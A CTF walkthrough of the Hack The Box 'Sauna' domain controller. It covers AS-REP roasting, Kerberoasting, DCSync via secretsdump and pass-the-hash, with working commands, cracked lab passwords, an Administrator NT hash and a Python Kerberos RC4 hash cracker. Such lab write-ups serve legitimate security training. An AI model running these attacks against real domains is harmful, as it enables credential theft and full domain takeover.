Sauna Writeup

07 January 2023 #CTF #HTB #box #easy #windows

sauna info


A bit hot in there isn't it? A good nmap scan will cool us down:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-08 06:22:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-01-08T06:22:11
|_  start_date: N/A
|_clock-skew: 7h00m00s

From this scan result we can safely say that the box is an Active Directory domain controller (DNS + Kerberos + LDAP + SMB on one host). We get the domain name, egotistical-bank.local (the trailing "0." in nmap's LDAP output is a parsing artifact, and casing doesn't matter), and the hostname of the box, sauna. We should add both sauna.egotistical-bank.local and egotistical-bank.local to our /etc/hosts file. Also note the 7h00m00s clock skew nmap reports: Kerberos only tolerates 5 minutes by default, so this will bite us later.


DNS is listening on TCP, so we should try a zone transfer:

$ dig @ axfr egotistical-bank.local

; <<>> DiG 9.18.8-1-Debian <<>> @ axfr egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
$ dig @ axfr sauna.egotistical-bank.local

; <<>> DiG 9.18.8-1-Debian <<>> @ axfr sauna.egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.

Unlucky... Nice try tho.


Let's see if we can list shares anonymously:

$ smbclient -NL
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Doesn't look like we can.

Next we'll try to use rpcclient to dump users:

$ rpcclient -NU ''
rpcclient $> enumdomusers

Once again, we are denied access (same for all other RPC commands).


We get a standard home page with mostly lorem ipsum:


This seems to be a static website with only HTML pages. Let's get some directory bruteforcing going for good measure:

$ gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -o enum/root.dir -x html,txt
/images               (Status: 301) [Size: 150] [-->]
/index.html           (Status: 200) [Size: 32797]
/css                  (Status: 301) [Size: 147] [-->]
/contact.html         (Status: 200) [Size: 15634]
/blog.html            (Status: 200) [Size: 24695]
/about.html           (Status: 200) [Size: 30954]
/.                    (Status: 200) [Size: 32797]
/fonts                (Status: 301) [Size: 149] [-->]
/single.html          (Status: 200) [Size: 38059]

Nothing new is found.

In /about.html we find potential usernames:


Username Enumeration

With these names, we can build a username list using common mutations:

Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
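As an added example (not code from the writeup), here is one way to turn those full names into a candidate list. Which mutation patterns to include is my assumption; the page only tells us that first initial + surname ("fsmith") turned out to be the convention. The function and variable names are mine.

```python
# Added example: generate username candidates from full names for kerbrute.
# The pattern set below is an assumption about common AD naming conventions.

def mutate(full_name):
    """Return the common username forms for one 'First Last' string, no duplicates."""
    first, last = full_name.lower().split()
    f, l = first[0], last[0]
    patterns = [
        first + last, first + "." + last, first + "_" + last, first + "-" + last,
        f + last, f + "." + last, f + "_" + last,      # fsmith, f.smith, f_smith
        first + l, first + "." + l,                    # ferguss, fergus.s
        last + first, last + "." + first, last + f, last + "." + f,
        first, last,
    ]
    return list(dict.fromkeys(patterns))  # drop duplicates, keep order


def build_userlist(names):
    """Flatten the candidates for every name, keeping the list unique."""
    seen = []
    for name in names:
        for candidate in mutate(name):
            if candidate not in seen:
                seen.append(candidate)
    return seen


# Names taken from /about.html on the box.
NAMES = ["Fergus Smith", "Hugo Bear", "Steven Kerb",
         "Shaun Coins", "Bowie Taylor", "Sophie Driver"]

if __name__ == "__main__":
    with open("users.txt", "w") as fh:
        fh.write("\n".join(build_userlist(NAMES)) + "\n")
```

Feed the resulting users.txt to kerbrute as in the next step; Kerberos user enumeration does not lock accounts out and does not produce the 4625 logon-failure events that password spraying would, which is why it is the right first check.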




Let's use kerbrute to test if we have any valid username:

$ kerbrute userenum --dc -d egotistical-bank.local users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 00:58:26 >  Using KDC(s):
2023/01/08 00:58:26 >

2023/01/08 00:58:26 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local
2023/01/08 00:58:26 >  Done! Tested 24 usernames (1 valid) in 0.090 seconds

Nice, we have validated that the 'fsmith' account actually exists in the domain.


With a valid username, we can check whether Kerberos pre-authentication is disabled for that account (the DONT_REQ_PREAUTH flag in its userAccountControl). If it is, the KDC answers an AS-REQ for that user without us proving knowledge of the password. Part of that AS-REP (the enc-part carrying the session key) is encrypted with a key derived from the user's password, which for RC4-HMAC (etype 23) is simply the NT hash. We can grab that encrypted blob and crack it offline. This is commonly known as AS-REP roasting.

We'll use the GetNPUsers script from impacket to do that:

$ impacket-GetNPUsers -usersfile <(echo 'fsmith') egotistical-bank.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation


<(echo 'fsmith') is process substitution (bash and zsh): it hands GetNPUsers a /dev/fd path whose contents are the output of the command in parentheses, so the username list never touches the disk.

Great! We grabbed a hash. Time to crack it with hashcat (-m 18200 is the AS-REP etype 23 mode; recent hashcat versions also detect it from the $krb5asrep$23$ prefix):

$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt

Now that we have a password, we can try logging in via WinRM:

$ crackmapexec winrm -u fsmith -p Thestrokes23
SMB    5985   SAUNA      [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP    5985   SAUNA      [*]
WINRM    5985   SAUNA      [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

Yes we can! Let's use evil-winrm:

$ evil-winrm -i -u fsmith -p Thestrokes23 
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami



With a valid domain account we can now use BloodHound to enumerate the domain.

Grab the latest release of SharpHound (the default collector) from GitHub. Then we need to get the binary onto the target box. We'll use the upload feature of evil-winrm to do it:

*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /opt/SharpHound/SharpHound.exe .

Then we'll run the executable and use all collection methods:

*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe -c all

The results are stored in a zip archive. Let's use the download feature of evil-winrm to transfer it to our attack box:

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls

    Directory: C:\Users\FSmith\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         1/8/2023   6:01 PM          11609
-a----         1/8/2023   5:55 PM        1051648 SharpHound.exe
-a----         1/8/2023   6:01 PM           8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

*Evil-WinRM* PS C:\Users\FSmith\Documents> download /home/yep/CTF/HTB/machines/sauna/bloodhound/

Then just unzip it, drag and drop the JSON files into BloodHound's window and mark the 'fsmith' account as owned:

mark as owned

The 'Shortest Paths to Domain Admins from Owned Principals' query returns nothing. Next we can try to list all Kerberoastable accounts:

list all Kerberoastable accounts


We don't care about the 'krbtgt' account: its password is randomly generated and long (roughly 128 bytes), so cracking it is hopeless.

However, we can try with this 'hsmith' account (a second 'Smith' already).

The reason this user account is Kerberoastable is that it has an SPN (Service Principal Name) associated with it. SPNs identify service instances on the domain, and any authenticated domain user can request a service ticket (TGS) for any SPN. That ticket is encrypted with the key of the account that owns the SPN, which for RC4-HMAC is that account's NT hash, so we can take it offline and crack it just like the AS-REP blob.

Once again, impacket to the rescue:

$ impacket-GetUserSPNs egotistical-bank.local/fsmith:Thestrokes23 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>               

[-] CCache file is not found. Skipping...

If you run into a KRB_AP_ERR_SKEW (Clock skew too great) error, sync your VM's clock to the DC with sudo ntpdate first. nmap already told us the box is 7 hours off, and the KDC rejects anything beyond 5 minutes by default.

Let's fire up hashcat again to crack this new hash (-m 13100 is the Kerberoast etype 23 mode, matching the $krb5tgs$23$ prefix):

$ hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

It's the same password lol...
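The two hashcat runs above (the AS-REP roast of fsmith and the Kerberoast of hsmith) are the same computation: a dictionary attack against RC4-HMAC (etype 23) Kerberos data, where the NT hash of the guessed password is the encryption key. As an added example, not code from the writeup or from hashcat, here is that check written from scratch with only the Python standard library, handling both the hashcat 18200 and 13100 formats. The writeup does not reproduce the actual hashes, so the sample lines are constructed by encrypting a dummy plaintext under the cracked password; the function names are mine.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """RFC 1320 MD4, implemented here because many OpenSSL builds no longer expose it to hashlib."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); with RC4-HMAC this is the Kerberos key itself."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key, msg):
    return hmac.new(key, msg, hashlib.md5).digest()


# Kerberos key-usage numbers: 8 for the AS-REP enc-part (RFC 4757 maps usage 3 to 8),
# 2 for the service ticket carried in a TGS-REP.
USAGE = {"asrep": 8, "tgs": 2}


def rc4_hmac_encrypt(key, usage, plaintext):
    """RFC 4757 encryption as the KDC does it: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = os.urandom(8) + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_verify(key, usage, checksum, edata):
    """The cracker's side: derive K3 from the guessed key, decrypt, recompute the checksum."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)


def make_asrep_hash(user, realm, password, plaintext):
    """Constructed sample in hashcat 18200 format (the writeup's real hash is not reproduced)."""
    blob = rc4_hmac_encrypt(nt_hash(password), USAGE["asrep"], plaintext)
    return "$krb5asrep$23$%s@%s:%s$%s" % (user, realm, blob[:16].hex(), blob[16:].hex())


def make_tgs_hash(user, realm, spn, password, plaintext):
    """Constructed sample in hashcat 13100 format."""
    blob = rc4_hmac_encrypt(nt_hash(password), USAGE["tgs"], plaintext)
    return "$krb5tgs$23$*%s$%s$%s*$%s$%s" % (user, realm, spn, blob[:16].hex(), blob[16:].hex())


def parse_hash(line):
    """Return (kind, hashcat_mode, usage, checksum, edata) for an etype-23 roasting hash."""
    if line.startswith("$krb5asrep$23$"):
        checksum, edata = line.split(":", 1)[1].split("$")
        return "asrep", 18200, USAGE["asrep"], bytes.fromhex(checksum), bytes.fromhex(edata)
    if line.startswith("$krb5tgs$23$"):
        checksum, edata = line.rsplit("$", 2)[1:]
        return "tgs", 13100, USAGE["tgs"], bytes.fromhex(checksum), bytes.fromhex(edata)
    raise ValueError("only RC4-HMAC (etype 23) handled; AES Kerberoast hashes are modes 19600/19700")


def check_password(line, candidate):
    _, _, usage, checksum, edata = parse_hash(line)
    return rc4_hmac_verify(nt_hash(candidate), usage, checksum, edata)


def crack(line, wordlist):
    """Offline dictionary attack: per guess one MD4, three HMAC-MD5 and one RC4, and no KDC traffic."""
    return next((w for w in wordlist if check_password(line, w)), None)


if __name__ == "__main__":
    sample = make_asrep_hash("fsmith", "EGOTISTICAL-BANK.LOCAL", "Thestrokes23", b"A" * 40)
    print(parse_hash(sample)[:2], crack(sample, ["password", "Summer2020", "Thestrokes23"]))
```

The per-guess cost (a few MD5/MD4 operations and an RC4 keystream) is why rockyou.txt finishes in seconds, and why the defensive fixes are on the account side: re-enable pre-authentication, give service accounts long random passwords or gMSAs, and prefer AES etypes so that hashcat has to use the far slower PBKDF2-based modes.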


This 'hsmith' account leads us nowhere, so we'll take a step back and perform some more local enumeration with winPEAS:

Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

We find another set of creds. If we look this account up on BloodHound, we get some interesting results:

outbound object control

Note that the account name is 'svc_loanmgr' and not 'svc_loanmanager'.

BloodHound shows it holds the replication rights on the domain object (GetChanges and GetChangesAll), which is exactly what DCSync needs.


DCSync is an attack that retrieves password hashes from the Active Directory database (NTDS.DIT) without touching the file. It abuses the Directory Replication Service (DRSUAPI), which is normally used by domain controllers to replicate data between each other: any principal holding the "Replicating Directory Changes" and "Replicating Directory Changes All" rights can ask a DC to replicate account secrets to it, no local admin required.

The secretsdump script from impacket (I love impacket) is able to perform that attack remotely (otherwise we could use mimikatz on the target box). Expect the RemoteOperations step to fail with access denied, since svc_loanmgr is not a local admin and cannot dump SAM/LSA; the DRSUAPI path that follows only needs the replication rights:

$ impacket-secretsdump 'egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround!@'  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Pass the Hash as Administrator

With the Administrator NT hash we don't need the cleartext password: wmiexec or psexec authenticate with the hash directly (pass the hash). wmiexec runs commands as Administrator over WMI, while psexec writes a service binary to ADMIN$ and gives NT AUTHORITY\SYSTEM at the cost of being much noisier:

$ impacket-wmiexec egotistical-bank.local/Administrator@ -hashes :823452073d75b9d1cf70ebdf86c7f98e      
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

Key Takeaways